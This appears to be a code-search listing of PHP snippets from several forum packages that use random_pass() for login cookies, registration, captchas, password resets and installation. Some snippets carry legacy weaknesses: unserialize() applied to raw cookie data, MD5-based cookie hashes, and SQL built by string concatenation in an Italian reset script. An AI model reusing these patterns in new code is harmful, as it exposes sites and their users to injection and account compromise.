Esempio n. 1
0
function check_cookie(&$pun_user)
{
    global $db, $pun_config, $cookie_name, $cookie_seed;
    $now = time();
    $expire = $now + 31536000;
    // The cookie expires after a year
    // We assume it's a guest
    $cookie = array('user_id' => 1, 'password_hash' => 'Guest');
    // If a cookie is set, we get the user_id and password hash from it
    if (isset($_COOKIE[$cookie_name])) {
        list($cookie['user_id'], $cookie['password_hash']) = @unserialize($_COOKIE[$cookie_name]);
    }
    if ($cookie['user_id'] > 1) {
        // Check if there's a user with the user ID and password hash from the cookie
        $result = $db->query('SELECT u.*, g.*, o.logged, o.idle FROM ' . $db->prefix . 'users AS u INNER JOIN ' . $db->prefix . 'groups AS g ON u.group_id=g.g_id LEFT JOIN ' . $db->prefix . 'online AS o ON o.user_id=u.id WHERE u.id=' . intval($cookie['user_id'])) or error('Unable to fetch user information', __FILE__, __LINE__, $db->error());
        $pun_user = $db->fetch_assoc($result);
        // If user authorisation failed
        if (!isset($pun_user['id']) || md5($cookie_seed . $pun_user['password']) !== $cookie['password_hash']) {
            pun_setcookie(0, random_pass(8), $expire);
            set_default_user();
            return;
        }
        // Set a default language if the user selected language no longer exists
        if (!@file_exists(PUN_ROOT . 'lang/' . $pun_user['language'])) {
            $pun_user['language'] = $pun_config['o_default_lang'];
        }
        // Set a default style if the user selected style no longer exists
        if (!(@file_exists(PUN_ROOT . 'style/' . $pun_user['style'] . '.css') || defined('PUN_STYLE_DIR') && defined('PUN_STYLE_PATH') && @file_exists(PUN_STYLE_DIR . $pun_user['style'] . '.css'))) {
            trigger_error('resetting');
            $pun_user['style'] = $pun_config['o_default_style'];
        }
        if (!$pun_user['disp_topics']) {
            $pun_user['disp_topics'] = $pun_config['o_disp_topics_default'];
        }
        if (!$pun_user['disp_posts']) {
            $pun_user['disp_posts'] = $pun_config['o_disp_posts_default'];
        }
        if ($pun_user['save_pass'] == '0') {
            $expire = 0;
        }
        // Define this if you want this visit to affect the online list and the users last visit data
        if (!defined('PUN_QUIET_VISIT')) {
            // Update the online list
            if (!$pun_user['logged']) {
                $db->query('INSERT INTO ' . $db->prefix . 'online (user_id, ident, logged) VALUES(' . $pun_user['id'] . ', \'' . $db->escape($pun_user['username']) . '\', ' . $now . ')') or error('Unable to insert into online list', __FILE__, __LINE__, $db->error());
            } else {
                // Special case: We've timed out, but no other user has browsed the forums since we timed out
                if ($pun_user['logged'] < $now - $pun_config['o_timeout_visit']) {
                    $db->query('UPDATE ' . $db->prefix . 'users SET last_visit=' . $pun_user['logged'] . ' WHERE id=' . $pun_user['id']) or error('Unable to update user visit data', __FILE__, __LINE__, $db->error());
                    $pun_user['last_visit'] = $pun_user['logged'];
                }
                $idle_sql = $pun_user['idle'] == '1' ? ', idle=0' : '';
                $db->query('UPDATE ' . $db->prefix . 'online SET logged=' . $now . $idle_sql . ' WHERE user_id=' . $pun_user['id']) or error('Unable to update online list', __FILE__, __LINE__, $db->error());
            }
        }
        $pun_user['is_guest'] = false;
    } else {
        set_default_user();
    }
}
 function hook_register_before_header()
 {
     global $required_fields, $errors, $cookie_name, $cookie_seed;
     $this->load_lang();
     $required_fields['req_word'] = $this->lang['Captcha'];
     $time = time();
     $word = random_pass(mt_rand(4, 6));
     $hash = sha1(strtolower($word) . $cookie_seed . 'secret' . $time);
     forum_setcookie($cookie_name . '_captcha', $hash . '-' . $time, $time + 120);
     $array = str_split($word);
     $mixin = random_pass(mt_rand(1, 3));
     $i = -1;
     $this->styles = '';
     foreach (str_split($mixin) as $ch) {
         $i = mt_rand($i + 1, count($array));
         array_splice($array, $i, 0, $ch);
         $this->styles .= '.masq i:nth-child(' . ($i + 1) . '){display:none;} ';
     }
     $this->spans = '<i>' . implode('</i><i>', $array) . '</i>';
 }
Esempio n. 3
0
    $page_title = array($panther_config['o_board_title'], $lang_admin_common['Admin'], $lang_admin_common['Prune']);
    define('PANTHER_ACTIVE_PAGE', 'admin');
    require PANTHER_ROOT . 'header.php';
    generate_admin_menu('maintenance');
    $tpl = load_template('confirm_prune.tpl');
    echo $tpl->render(array('lang_admin_maintenance' => $lang_admin_maintenance, 'lang_admin_common' => $lang_admin_common, 'link' => panther_link($panther_url['admin_maintenance']), 'csrf_token' => generate_csrf_token(PANTHER_ADMIN_DIR . '/maintenance.php'), 'prune_days' => $prune_days, 'prune_sticky' => $prune_sticky, 'prune_from' => $prune_from, 'forum' => $forum, 'num_topics' => forum_number_format($num_topics)));
    require PANTHER_ROOT . 'footer.php';
}
if ($action == 'add_user') {
    $errors = array();
    $username = isset($_POST['username']) ? panther_trim($_POST['username']) : '';
    $random_pass = isset($_POST['random_pass']) && $_POST['random_pass'] == '1' ? 1 : 0;
    $email = isset($_POST['email']) ? strtolower(panther_trim($_POST['email'])) : '';
    $password_salt = random_pass(16);
    if ($random_pass == '1') {
        $password1 = random_pass(12);
        $password2 = $password1;
    } else {
        $password1 = isset($_POST['password1']) ? panther_trim($_POST['password1']) : '';
        $password2 = isset($_POST['password2']) ? panther_trim($_POST['password2']) : '';
    }
    require PANTHER_ROOT . 'lang/' . $panther_user['language'] . '/prof_reg.php';
    // Validate username and passwords
    check_username($username);
    if (panther_strlen($password1) < 6) {
        $errors[] = $lang_prof_reg['Pass too short'];
    } else {
        if ($password1 != $password2) {
            $errors[] = $lang_prof_reg['Pass not match'];
        }
    }
Esempio n. 4
0
             if ($pun_config['p_allow_dupe_email'] == '0') {
                 message($lang_prof_reg['Dupe email']);
             } else {
                 if ($pun_config['o_mailing_list'] != '') {
                     while ($cur_dupe = $db->fetch_assoc($result)) {
                         $dupe_list[] = $cur_dupe['username'];
                     }
                     $mail_subject = $lang_common['Duplicate email notification'];
                     $mail_message = sprintf($lang_common['Duplicate email change message'], $pun_user['username'], implode(', ', $dupe_list)) . "\n";
                     $mail_message .= sprintf($lang_common['User profile'], get_base_url() . '/profile.php?id=' . $id) . "\n";
                     $mail_message .= "\n" . '--' . "\n" . $lang_common['Email signature'];
                     pun_mail($pun_config['o_mailing_list'], $mail_subject, $mail_message);
                 }
             }
         }
         $new_email_key = random_pass(8);
         $db->query('UPDATE ' . $db->prefix . 'users SET activate_string=\'' . $db->escape($new_email) . '\', activate_key=\'' . $new_email_key . '\' WHERE id=' . $id) or error('Unable to update activation data', __FILE__, __LINE__, $db->error());
         // Load the "activate email" template
         $mail_tpl = trim(file_get_contents(PUN_ROOT . 'lang/' . $pun_user['language'] . '/mail_templates/activate_email.tpl'));
         // The first row contains the subject
         $first_crlf = strpos($mail_tpl, "\n");
         $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
         $mail_message = trim(substr($mail_tpl, $first_crlf));
         $mail_message = str_replace('<username>', $pun_user['username'], $mail_message);
         $mail_message = str_replace('<base_url>', get_base_url(), $mail_message);
         $mail_message = str_replace('<activation_url>', get_base_url() . '/profile.php?action=change_email&id=' . $id . '&key=' . $new_email_key, $mail_message);
         $mail_message = str_replace('<board_mailer>', $pun_config['o_board_title'] . ' ' . $lang_common['Mailer'], $mail_message);
         pun_mail($new_email, $mail_subject, $mail_message);
         message($lang_profile['Activate email sent'] . ' <a href="mailto:' . $pun_config['o_admin_email'] . '">' . $pun_config['o_admin_email'] . '</a>.', true);
     }
 }
Esempio n. 5
0
 * Based on code by Rickard Andersson copyright (C) 2002-2008 PunBB
 * Licensed under GPLv2 (http://getluna.org/license.php)
 */
define('LUNA_ROOT', '../');
require LUNA_ROOT . 'include/common.php';
if (!$is_admin) {
    header("Location: login.php");
}
// Create new user
if (isset($_POST['add_user'])) {
    $username = luna_trim($_POST['username']);
    $email1 = strtolower(trim($_POST['email']));
    $email2 = strtolower(trim($_POST['email']));
    $trimpassword = trim($_POST['password']);
    if (isset($_POST['random_pass'])) {
        $password = random_pass(8);
    } elseif (!empty($trimpassword)) {
        $password = trim($_POST['password']);
    } else {
        redirect('backstage/users.php?user_failed=true');
    }
    $errors = array();
    // Convert multiple whitespace characters into one (to prevent people from registering with indistinguishable usernames)
    $username = preg_replace('#\\s+#s', ' ', $username);
    // Validate username and passwords
    if (strlen($username) < 2) {
        message_backstage(__('Usernames must be at least 2 characters long. Please choose another (longer) username.', 'luna'));
    } elseif (luna_strlen($username) > 25) {
        // This usually doesn't happen since the form element only accepts 25 characters
        message_backstage(__('Passwords must be at least 6 characters long. Please choose another (longer) password.', 'luna'));
    } elseif (!strcasecmp($username, 'Guest') || !strcasecmp($username, __('Guest', 'luna'))) {
Esempio n. 6
0
     if ($_SESSION['captcha_keystring'] != strtolower(trim($_POST['req_image_']))) {
         unset($_SESSION['captcha_keystring']);
         message($lang_register['Text mismatch']);
     }
     if (!isset($_SESSION['captcha_keystring'])) {
         unset($_SESSION['captcha_keystring']);
         message($lang_common['Bad request']);
     }
     unset($_SESSION['captcha_keystring']);
 }
 // IMAGE VERIFICATION MOD END
 $username = pun_trim($_POST['req_username']);
 $email1 = strtolower(trim($_POST['req_email1']));
 if ($pun_config['o_regs_verify'] == 1) {
     $email2 = strtolower(trim($_POST['req_email2']));
     $password1 = random_pass(mt_rand(8, 9));
     $password2 = $password1;
 } else {
     $password1 = trim($_POST['req_password1']);
     $password2 = trim($_POST['req_password2']);
 }
 // Convert multiple whitespace characters into one (to prevent people from registering with indistinguishable usernames)
 $username = preg_replace('#\\s+#s', ' ', $username);
 // Validate username and passwords
 if (mb_strlen($username) < 2) {
     message($lang_prof_reg['Username too short']);
 } else {
     if (mb_strlen($username) > 25) {
         // This usually doesn't happen since the form element only accepts 25 characters
         message($lang_common['Bad request']);
     } else {
Esempio n. 7
0
 public function check_for_errors()
 {
     global $lang_register, $lang_prof_reg, $lang_common, $lang_antispam, $lang_antispam_questions;
     $user = array();
     $user['errors'] = '';
     // Check that someone from this IP didn't register a user within the last hour (DoS prevention)
     $already_registered = DB::for_table('users')->where('registration_ip', get_remote_address())->where_gt('registered', time() - 3600)->find_one();
     if ($already_registered) {
         message($lang_register['Registration flood']);
     }
     $user['username'] = feather_trim($this->request->post('req_user'));
     $user['email1'] = strtolower(feather_trim($this->request->post('req_email1')));
     if ($this->config['o_regs_verify'] == '1') {
         $email2 = strtolower(feather_trim($this->request->post('req_email2')));
         $user['password1'] = random_pass(12);
         $password2 = $user['password1'];
     } else {
         $user['password1'] = feather_trim($this->request->post('req_password1'));
         $password2 = feather_trim($this->request->post('req_password2'));
     }
     // Validate username and passwords
     $user['errors'] = check_username($user['username'], $user['errors']);
     if (feather_strlen($user['password1']) < 6) {
         $user['errors'][] = $lang_prof_reg['Pass too short'];
     } elseif ($user['password1'] != $password2) {
         $user['errors'][] = $lang_prof_reg['Pass not match'];
     }
     // Antispam feature
     $question = $this->request->post('captcha_q') ? trim($this->request->post('captcha_q')) : '';
     $answer = $this->request->post('captcha') ? strtoupper(trim($this->request->post('captcha'))) : '';
     $lang_antispam_questions_array = array();
     foreach ($lang_antispam_questions as $k => $v) {
         $lang_antispam_questions_array[md5($k)] = strtoupper($v);
     }
     if (empty($lang_antispam_questions_array[$question]) || $lang_antispam_questions_array[$question] != $answer) {
         $user['errors'][] = $lang_antispam['Robot test fail'];
     }
     // Validate email
     require FEATHER_ROOT . 'include/email.php';
     if (!is_valid_email($user['email1'])) {
         $user['errors'][] = $lang_common['Invalid email'];
     } elseif ($this->config['o_regs_verify'] == '1' && $user['email1'] != $email2) {
         $user['errors'][] = $lang_register['Email not match'];
     }
     // Check if it's a banned email address
     if (is_banned_email($user['email1'])) {
         if ($this->config['p_allow_banned_email'] == '0') {
             $user['errors'][] = $lang_prof_reg['Banned email'];
         }
         $user['banned_email'] = 1;
         // Used later when we send an alert email
     }
     // Check if someone else already has registered with that email address
     $dupe_list = array();
     $dupe_mail = DB::for_table('users')->select('username')->where('email', $user['email1'])->find_many();
     if ($dupe_mail) {
         if ($this->config['p_allow_dupe_email'] == '0') {
             $user['errors'][] = $lang_prof_reg['Dupe email'];
         }
         foreach ($dupe_mail as $cur_dupe) {
             $dupe_list[] = $cur_dupe['username'];
         }
     }
     // Make sure we got a valid language string
     if ($this->request->post('language')) {
         $user['language'] = preg_replace('%[\\.\\\\/]%', '', $this->request->post('language'));
         if (!file_exists(FEATHER_ROOT . 'lang/' . $user['language'] . '/common.php')) {
             message($lang_common['Bad request'], '404');
         }
     } else {
         $user['language'] = $this->config['o_default_lang'];
     }
     return $user;
 }
Esempio n. 8
0
 $schema = array('FIELDS' => array('id' => array('datatype' => 'INT(10) UNSIGNED AUTO_INCREMENT', 'allow_null' => false), 'title' => array('datatype' => 'varchar(50)', 'allow_null' => false, 'default' => '\'New Action\''), 'close' => array('datatype' => 'TINYINT(1) UNSIGNED', 'allow_null' => false, 'default' => '\'2\''), 'stick' => array('datatype' => 'TINYINT(1) UNSIGNED', 'allow_null' => false, 'default' => '\'2\''), 'move' => array('datatype' => 'TINYINT(1) UNSIGNED', 'allow_null' => false, 'default' => '\'0\''), 'archive' => array('datatype' => 'TINYINT(1) UNSIGNED', 'allow_null' => false, 'default' => '\'0\''), 'leave_redirect' => array('datatype' => 'TINYINT(1) UNSIGNED', 'allow_null' => false, 'default' => '\'0\''), 'reply_message' => array('datatype' => 'mediumtext', 'allow_null' => true), 'add_start' => array('datatype' => 'VARCHAR(50)', 'allow_null' => true, 'default' => null), 'add_end' => array('datatype' => 'VARCHAR(50)', 'allow_null' => true, 'default' => null), 'send_email' => array('datatype' => 'TINYINT(1)', 'allow_null' => false, 'default' => '0'), 'increment_posts' => array('datatype' => 'TINYINT(1)', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('multi_moderation', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'INT(10) UNSIGNED AUTO_INCREMENT', 'allow_null' => false), 'rank' => array('datatype' => 'VARCHAR(50)', 'allow_null' => false, 'default' => '\'\''), 'min_posts' => array('datatype' => 'MEDIUMINT(8) UNSIGNED', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('ranks', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'INT(10) UNSIGNED AUTO_INCREMENT', 'allow_null' => false), 'image' => array('datatype' => 'VARCHAR(40)', 'allow_null' => false, 'default' => '\'\''), 'code' => array('datatype' => 'VARCHAR(20)', 'allow_null' => false, 'default' => '\'\''), 'disp_position' => array('datatype' => 'TINYINT(2) UNSIGNED', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('smilies', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'INT(10) UNSIGNED AUTO_INCREMENT', 'allow_null' => false), 'title' => array('datatype' => 'VARCHAR(50)', 'allow_null' => false, 'default' => '\'New Task\''), 'next_run' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '\'0\''), 'script' => array('datatype' => 'VARCHAR(30)', 'allow_null' => false), 'minute' => array('datatype' => 'VARCHAR(2)', 'allow_null' => false, 'default' => '\'*\''), 'hour' => array('datatype' => 'VARCHAR(2)', 'allow_null' => false, 'default' => '\'*\''), 'day' => array('datatype' => 'VARCHAR(2)', 'allow_null' => false, 'default' => '\'*\''), 'month' => array('datatype' => 'VARCHAR(2)', 'allow_null' => false, 'default' => '\'*\''), 'week_day' => array('datatype' => 'VARCHAR(1)', 'allow_null' => false, 'default' => '\'*\''), 'locked' => array('datatype' => 'TINYINT(1)', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('tasks', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'SERIAL', 'allow_null' => false), 'user_id' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'type_id' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'post_id' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'title' => array('datatype' => 'VARCHAR(120)', 'allow_null' => false, 'default' => '\'\''), 'points' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'date_issued' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'date_expire' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'issued_by' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'expired' => array('datatype' => 'TINYINT(1)', 'allow_null' => false, 'default' => '0'), 'note_admin' => array('datatype' => 'TEXT', 'allow_null' => true), 'note_post' => array('datatype' => 'MEDIUMTEXT', 'allow_null' => true), 'note_pm' => array('datatype' => 'TEXT', 'allow_null' => true)), 'PRIMARY KEY' => array('id'));
 $db->create_table('warnings', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'SERIAL', 'allow_null' => false), 'title' => array('datatype' => 'VARCHAR(120)', 'allow_null' => false, 'default' => '\'\''), 'description' => array('datatype' => 'TEXT', 'allow_null' => true), 'points' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'expiration_time' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('warning_types', $schema);
 $schema = array('FIELDS' => array('id' => array('datatype' => 'SERIAL', 'allow_null' => false), 'points' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0'), 'message' => array('datatype' => 'VARCHAR(255)', 'allow_null' => false, 'default' => '\'\''), 'period' => array('datatype' => 'INT(10) UNSIGNED', 'allow_null' => false, 'default' => '0')), 'PRIMARY KEY' => array('id'));
 $db->create_table('warning_levels', $schema);
 $now = time();
 $password_salt = random_pass(16);
 $insert = array('g_id' => 1, 'g_title' => $lang_install['Administrators'], 'g_user_title' => $lang_install['Administrator'], 'g_moderator' => 0, 'g_mod_cp' => 0, 'g_global_moderator' => 0, 'g_mod_edit_users' => 0, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 0, 'g_mod_ban_users' => 0, 'g_mod_edit_admin_posts' => 0, 'g_read_board' => 1, 'g_post_polls' => 1, 'g_view_users' => 1, 'g_post_replies' => 1, 'g_post_topics' => 1, 'g_edit_posts' => 1, 'g_edit_subject' => 1, 'g_delete_posts' => 1, 'g_delete_topics' => 1, 'g_set_title' => 1, 'g_search' => 1, 'g_search_users' => 1, 'g_send_email' => 1, 'g_post_flood' => 0, 'g_use_pm' => 1, 'g_pm_limit' => 0, 'g_search_flood' => 0, 'g_email_flood' => 0, 'g_report_flood' => 0, 'g_rep_enabled' => 1, 'g_rep_interval' => 0, 'g_rep_plus' => 0, 'g_rep_minus' => 0, 'g_colour' => '#AA0000');
 // Insert the five preset groups
 $db->insert('groups', $insert);
 $insert = array('g_id' => 2, 'g_title' => $lang_install['Global Moderators'], 'g_user_title' => $lang_install['Global Moderator'], 'g_moderator' => 1, 'g_mod_cp' => 1, 'g_global_moderator' => 1, 'g_mod_edit_users' => 1, 'g_mod_sfs_report' => 1, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 1, 'g_mod_ban_users' => 1, 'g_post_polls' => 1, 'g_mod_warn_users' => 1, 'g_mod_edit_admin_posts' => 1, 'g_read_board' => 1, 'g_view_users' => 1, 'g_post_replies' => 1, 'g_post_topics' => 1, 'g_edit_posts' => 1, 'g_edit_subject' => 1, 'g_delete_posts' => 1, 'g_delete_topics' => 1, 'g_set_title' => 1, 'g_search' => 1, 'g_search_users' => 1, 'g_send_email' => 1, 'g_post_flood' => 0, 'g_use_pm' => 1, 'g_pm_limit' => 0, 'g_search_flood' => 0, 'g_email_flood' => 0, 'g_report_flood' => 0, 'g_rep_enabled' => 1, 'g_rep_interval' => 0, 'g_rep_plus' => 0, 'g_rep_minus' => 0, 'g_colour' => '#0000CC', 'g_attach_files' => 1, 'g_max_attachments' => 5, 'g_max_size' => 10485760);
 $db->insert('groups', $insert);
 $insert = array('g_id' => 3, 'g_title' => $lang_install['Moderators'], 'g_user_title' => $lang_install['Moderator'], 'g_moderator' => 1, 'g_mod_cp' => 1, 'g_global_moderator' => 0, 'g_mod_edit_users' => 0, 'g_mod_sfs_report' => 1, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 0, 'g_mod_ban_users' => 1, 'g_mod_warn_users' => 1, 'g_mod_edit_admin_posts' => 0, 'g_read_board' => 1, 'g_post_polls' => 1, 'g_view_users' => 1, 'g_post_replies' => 1, 'g_post_topics' => 1, 'g_edit_posts' => 1, 'g_edit_subject' => 1, 'g_delete_posts' => 1, 'g_delete_topics' => 1, 'g_set_title' => 1, 'g_search' => 1, 'g_search_users' => 1, 'g_send_email' => 1, 'g_post_flood' => 0, 'g_use_pm' => 1, 'g_pm_limit' => 0, 'g_search_flood' => 0, 'g_email_flood' => 0, 'g_report_flood' => 0, 'g_rep_enabled' => 1, 'g_rep_interval' => 0, 'g_rep_plus' => 0, 'g_rep_minus' => 0, 'g_colour' => '#00AA00', 'g_attach_files' => 1, 'g_max_attachments' => 5, 'g_max_size' => 10485760, 'g_pm_folder_limit' => 10);
 $db->insert('groups', $insert);
 $insert = array('g_id' => 4, 'g_title' => $lang_install['Guests'], 'g_moderator' => 0, 'g_mod_cp' => 0, 'g_global_moderator' => 0, 'g_mod_edit_users' => 0, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 0, 'g_mod_ban_users' => 0, 'g_mod_warn_users' => 0, 'g_mod_edit_admin_posts' => 0, 'g_read_board' => 1, 'g_view_users' => 0, 'g_post_replies' => 0, 'g_post_topics' => 0, 'g_edit_posts' => 0, 'g_edit_subject' => 0, 'g_delete_posts' => 0, 'g_delete_topics' => 0, 'g_set_title' => 0, 'g_search' => 1, 'g_search_users' => 0, 'g_send_email' => 0, 'g_post_flood' => 60, 'g_use_pm' => 0, 'g_pm_limit' => 0, 'g_search_flood' => 30, 'g_email_flood' => 0, 'g_report_flood' => 0, 'g_rep_enabled' => 0, 'g_rep_interval' => 0, 'g_rep_plus' => 0, 'g_rep_minus' => 0, 'g_colour' => '', 'g_attach_files' => 0);
 $db->insert('groups', $insert);
 $insert = array('g_id' => 5, 'g_title' => $lang_install['Members'], 'g_moderator' => 0, 'g_global_moderator' => 0, 'g_mod_edit_users' => 0, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 0, 'g_mod_ban_users' => 0, 'g_mod_warn_users' => 0, 'g_mod_edit_admin_posts' => 0, 'g_read_board' => 1, 'g_view_users' => 1, 'g_post_polls' => 1, 'g_post_replies' => 1, 'g_post_topics' => 1, 'g_edit_posts' => 1, 'g_edit_subject' => 0, 'g_delete_posts' => 0, 'g_delete_topics' => 0, 'g_set_title' => 0, 'g_search' => 1, 'g_search_users' => 1, 'g_send_email' => 1, 'g_post_flood' => 5, 'g_use_pm' => 1, 'g_pm_limit' => 100, 'g_search_flood' => 30, 'g_email_flood' => 30, 'g_report_flood' => 30, 'g_rep_enabled' => 1, 'g_rep_interval' => 5, 'g_rep_plus' => 10, 'g_rep_minus' => 5, 'g_colour' => '', 'g_attach_files' => 1, 'g_max_attachments' => 2, 'g_max_size' => 5242880, 'g_pm_folder_limit' => 5);
 $db->insert('groups', $insert);
 $insert = array('g_id' => 6, 'g_title' => $lang_install['New members'], 'g_moderator' => 0, 'g_global_moderator' => 0, 'g_mod_edit_users' => 0, 'g_promote_min_posts' => 5, 'g_promote_next_group' => 5, 'g_mod_rename_users' => 0, 'g_mod_change_passwords' => 0, 'g_mod_ban_users' => 0, 'g_mod_warn_users' => 0, 'g_mod_edit_admin_posts' => 0, 'g_read_board' => 1, 'g_post_polls' => 1, 'g_view_users' => 0, 'g_post_replies' => 1, 'g_post_topics' => 1, 'g_edit_posts' => 1, 'g_edit_subject' => 0, 'g_deledit_interval' => 600, 'g_delete_posts' => 0, 'g_delete_topics' => 0, 'g_set_title' => 0, 'g_search' => 1, 'g_search_users' => 0, 'g_send_email' => 1, 'g_post_flood' => 60, 'g_use_pm' => 0, 'g_pm_limit' => 0, 'g_search_flood' => 30, 'g_email_flood' => 60, 'g_report_flood' => 60, 'g_rep_enabled' => 1, 'g_rep_interval' => 5, 'g_rep_plus' => 5, 'g_rep_minus' => 5, 'g_colour' => '', 'g_attach_files' => 0, 'g_max_attachments' => 0, 'g_max_size' => 1, 'g_pm_folder_limit' => 1);
 $db->insert('groups', $insert);
 $insert = array('group_id' => 4, 'username' => $lang_install['Guest'], 'password' => $lang_install['Guest'], 'email' => $lang_install['Guest']);
 // Insert guest and first admin user
Esempio n. 9
0
show_header();
show_menu();
list($username, $password) = get_data();
if (login($username, $password)) {
    _err("Sei loggato al forum, pertanto, NON puoi inviare una richiesta di recupero password!");
}
$error_msg = array();
//inizializzo l'array di errori
if (@$_GET['sendpassword'] == 1 && check_maintenance(2) != 1) {
    $email = clear($_POST['email']);
    if (empty($email)) {
        $error_msg[] = "<font color=\"red\"><p><i>Inserire E-Mail per il recupero Password</i><p></font>";
    } elseif (check_email($email) == FALSE) {
        $error_msg[] = "<font color=\"red\"><p><i>Email inserita non valida!</i><p></font>";
    } elseif (check_user($email)) {
        $new_password = random_pass();
        mysql_query("UPDATE " . __PREFIX__ . "users SET password = '******' WHERE email = '" . $email . "'") or _err(mysql_error());
        $config = mysql_fetch_array(mysql_query("SELECT site_name, description FROM " . __PREFIX__ . "settings"));
        $oggetto = "Recupera password: "******".";
        $messaggio = "Hai utilizzato il modulo per la reimpostazione della password su " . $config['site_name'] . "\n" . "Ecco quindi la tua nuova password:\n\n" . "Password: "******"\n\n" . "Lo Staff ~ " . $config['site_name'] . ".";
        @mail($email, $oggetto, $messaggio, "From: " . $email);
        print "<p align=\"center\">Email Inviata con la nuova password a: " . $email . " :D</p>";
        header("refresh:5; url=login.php");
        exit;
    } else {
        $error_msg[] = "<font color=red><p><i>Email Inesistente nel Forum!</i><p></font>";
    }
}
if ($error_msg) {
    print '<div class="error_msg">
		  <h3 align="center">Errori nella fase di compilazione della form</h2><br />
Esempio n. 10
0
 public function password_forgotten()
 {
     global $lang_common, $lang_login;
     if (!$this->user->is_guest) {
         header('Location: ' . get_base_url());
         exit;
     }
     // Start with a clean slate
     $errors = array();
     if ($this->feather->request()->isPost()) {
         require FEATHER_ROOT . 'include/email.php';
         // Validate the email address
         $email = strtolower(feather_trim($this->request->post('req_email')));
         if (!is_valid_email($email)) {
             $errors[] = $lang_common['Invalid email'];
         }
         // Did everything go according to plan?
         if (empty($errors)) {
             $select_password_forgotten = array('id', 'username', 'last_email_sent');
             $result = DB::for_table('users')->select_many($select_password_forgotten)->where('email', $email)->find_many();
             if ($result) {
                 // Load the "activate password" template
                 $mail_tpl = trim(file_get_contents(FEATHER_ROOT . 'lang/' . $this->user->language . '/mail_templates/activate_password.tpl'));
                 // The first row contains the subject
                 $first_crlf = strpos($mail_tpl, "\n");
                 $mail_subject = trim(substr($mail_tpl, 8, $first_crlf - 8));
                 $mail_message = trim(substr($mail_tpl, $first_crlf));
                 // Do the generic replacements first (they apply to all emails sent out here)
                 $mail_message = str_replace('<base_url>', get_base_url() . '/', $mail_message);
                 $mail_message = str_replace('<board_mailer>', $this->config['o_board_title'], $mail_message);
                 // Loop through users we found
                 foreach ($result as $cur_hit) {
                     if ($cur_hit->last_email_sent != '' && time() - $cur_hit->last_email_sent < 3600 && time() - $cur_hit->last_email_sent >= 0) {
                         message(sprintf($lang_login['Email flood'], intval((3600 - (time() - $cur_hit->last_email_sent)) / 60)), true);
                     }
                     // Generate a new password and a new password activation code
                     $new_password = random_pass(12);
                     $new_password_key = random_pass(8);
                     $update_password = array('activate_string' => feather_hash($new_password), 'activate_key' => $new_password_key, 'last_email_sent' => time());
                     DB::for_table('users')->where('id', $cur_hit->id)->find_one()->set($update_password)->save();
                     // Do the user specific replacements to the template
                     $cur_mail_message = str_replace('<username>', $cur_hit->username, $mail_message);
                     $cur_mail_message = str_replace('<activation_url>', get_link('user/' . $cur_hit->id . '/action/change_pass/?key=' . $new_password_key), $cur_mail_message);
                     $cur_mail_message = str_replace('<new_password>', $new_password, $cur_mail_message);
                     pun_mail($email, $mail_subject, $cur_mail_message);
                 }
                 message($lang_login['Forget mail'] . ' <a href="mailto:' . feather_escape($this->config['o_admin_email']) . '">' . feather_escape($this->config['o_admin_email']) . '</a>.', true);
             } else {
                 $errors[] = $lang_login['No email match'] . ' ' . htmlspecialchars($email) . '.';
             }
         }
     }
     return $errors;
 }
Esempio n. 11
0
function generate_login_key($uid = 1)
{
    global $db, $panther_user;
    $key = random_pass(60);
    $data = array(':key' => $key);
    $ps = $db->select('users', 1, $data, 'login_key=:key');
    if ($ps->rowCount()) {
        // There is already a key with this string (keys are unique)
        generate_login_key();
    } else {
        $data = array(':id' => $uid != 1 ? $uid : $panther_user['id']);
        $update = array('login_key' => $key);
        $db->update('users', $update, 'id=:id', $data);
        return $key;
    }
}
Esempio n. 12
0
function check_cookie(&$pun_user)
{
    # hacked to change interface language without a logged user
    global $db, $pun_config, $cookie_name, $cookie_path, $cookie_seed, $tmplang;
    $now = time();
    $expire = $now + 31536000;
    // The cookie expires after a year
    // We assume it's a guest
    $cookie = array('user_id' => 1, 'password_hash' => 'Invité');
    // If a cookie is set, we get the user_id and password hash from it
    if (isset($_COOKIE[$cookie_name])) {
        list($cookie['user_id'], $cookie['password_hash']) = @unserialize($_COOKIE[$cookie_name]);
    }
    if (isset($_COOKIE[$cookie_name]) && preg_match('/a:2:{i:0;s:\\d+:"(\\d+)";i:1;s:\\d+:"([0-9a-f]+)";}/', $_COOKIE[$cookie_name], $matches)) {
        list(, $cookie['user_id'], $cookie['password_hash']) = $matches;
    }
    if (isset($_GET['language'])) {
        $tmplang = $_GET['language'];
    } elseif (isset($_COOKIE['language'])) {
        $tmplang = $_COOKIE['language'];
    } else {
        $tmplang = "French";
    }
    if ($cookie['user_id'] > 1) {
